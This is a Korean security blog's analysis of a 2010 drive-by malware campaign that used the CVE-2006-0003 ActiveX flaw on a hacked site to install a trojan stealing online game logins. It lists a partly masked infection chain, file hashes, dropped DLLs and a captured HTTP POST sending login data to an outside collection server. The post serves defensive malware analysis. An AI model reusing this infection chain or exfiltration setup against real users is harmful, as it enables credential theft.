울지않는벌새 : Security, Movie & Society

악성코드 유포 : CVE-2006-0003 보안 취약점을 이용한 온라인 게임 계정 탈취 (2010.12.19)

벌새::Analysis
주말을 이용하여 국내 유명 인터넷 사이트 변조를 통한 온라인 게임 계정 탈취를 목적으로하는 악성코드 유포가 꾸준히 확인되고 있습니다.

특히 이번에 유포되는 사례 중 저번주에 이미 살펴본 유명 언론 사이트 해킹을 통해 등록된 악성 스크립트를 이용하는 방식이 여전히 동일한 URL 경로에서 확인이 되고 있으며, 오랫동안 보이지 않던 CVE-2006-0003 취약점을 이용한 악성코드 유포 방식이 확인이 되었습니다.



CVE-2006-0003 취약점을 이용한 악성코드 유포 사이트에 접속할 경우 그림과 같이 마이크로소프트(Microsoft)사에서 배포하는
[Microsoft Data Access - Remote Data Services Data Control] 관련 ActiveX 설치 유도창이 생성되는 것이 특징입니다.

해당 취약점은 2006년 4월에 보안 패치 공개를 통해 알려진 취약점으로 만약 해당 보안 패치가 적용되지 않은 시스템의 경우 보안 제품에서 실시간 감시를 통해 차단하지 않는다면 감염될 위험성에 노출됩니다.


[악성코드 유포 경로]

h**p://cutyline.zuzu***.jo***.com/illust/data/0805/1/index.html
 ㄴ h**p://cutyline.zuzu***.jo***.com/illust/data/0805/1/load.html
   ㄴ h**p://cutyline.zuzu***.jo***.com/illust/data/0805/1/1.html
     ㄴ h**p://down.ssl****.info/1217.exe
     ㄴ h**p://cutyline.zuzu***.jo***.com/illust/data/0805/1/k.js
   ㄴ h**p://cutyline.zuzu***.jo***.com/illust/data/0805/1/2.htm
     ㄴ h**p://down.ssl****.info/1217.exe
 ㄴ h**p://s14.cnzz.com/stat.php?id=2508468&web_id=2508468


유포 경로를 살펴보면 load.html 파일이 iframe을 이용하여 1.html / 2.htm 악성 스크립트를 다운로드하며, 보안 패치가 이루어지지 않은 Internet Explorer 사용자를 대상으로 시스템 감염을 위한 1217.exe 파일이 설치되도록 구성되어 있습니다.

보안 제품에서는 1.html 파일에 대하여 하우리 바이로봇(Hauri ViRobot) 제품에서 JS.S.Exploit.4543 (VirusTotal : 12/43) 진단명으로 진단되며, 2.htm 파일에 대하여 마이크로소프트(Microsoft) 제품에서 Exploit:HTML/MS06014 (VirusTotal : 11/42) 진단명으로 진단되고 있습니다.

최종적으로 다운로드되는 1217.exe (SHA1 : d806e9cd33b30538d711b923d2537321dff4b53d) 파일에 대하여 nProtect 보안 제품에서는 Trojan/W32.Agent.86016.AHI (VirusTotal : 19/42) 진단명으로 진단됩니다.


[생성 파일 등록 정보]

C:\WINDOWS\system32\imm32.dll :: 수정된 악성 imm32.dll 파일 - 114,176 Bytes
C:\WINDOWS\system32\imm32.dll.log :: imm32.dll 백업 정상 파일 - 110,080 Bytes
C:\WINDOWS\system32\ole.dll

[생성 파일 진단 정보]

C:\WINDOWS\system32\imm32.dll (SHA1 : 58ee0df51bced09a53e9433e3dd71d0dc43a9956)
 - AhnLab V3 : Trojan/Win32.Patched (VirusTotal : 14/43)
 - BitDefender : Gen:Variant.Kazy.3269

C:\WINDOWS\system32\ole.dll (SHA1 : e668b26ca1a9b3e9f6b805e39336f9a340f5dc05)
 - AhnLab V3 : Trojan/Win32.OnlineGameHack (VirusTotal : 13/43)

해당 악성코드는 감염시 NVCAgent.npc(네이버 백신 실시간 감시 프로세스), V3 보안 제품 등을 무력화 및 정상적인 imm32.dll 파일을 변조하며, 사용자가 웹 브라우저를 통한 특정 온라인 게임에 접속하여 로그인을 시도할 경우 ole.dll 악성 파일을 통해 계정 정보가 외부로 유출되도록 구성되어 있습니다.


ole.dll

[한게임 로그인시 네트워크 연결 정보]

POST /hgnv/lin.asp?CODE=mSSKmmUUIpQVUSHS~(생략)~SSpoRHSSpLV HTTP/1.1
Accept: image/gif, */*
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d86c3324596
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0
Host: asus.image-editor.info
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache


테스트에서 확인한 정보 수집 서버는 홍콩(HongKong)에 호스팅된 서버로 연결되고 있으며, 해당 유포 조직은 동일한 작동 원리를 이용하여 매번 보안 제품의 진단을 우회하도록 변종을 제작하여 꾸준하게 공격을 하고 있습니다.

최근 CVE-2010-3962 제로데이 취약점에 대한 보안 패치가 공개되면서 위와 같이 과거의 보안 취약점을 이용하는 것을 확인할 수 있으므로 사용자는 반드시 공개된 모든 보안 패치를 설치하시고 인터넷을 이용하시는 것이 가장 기본적인 예방책입니다.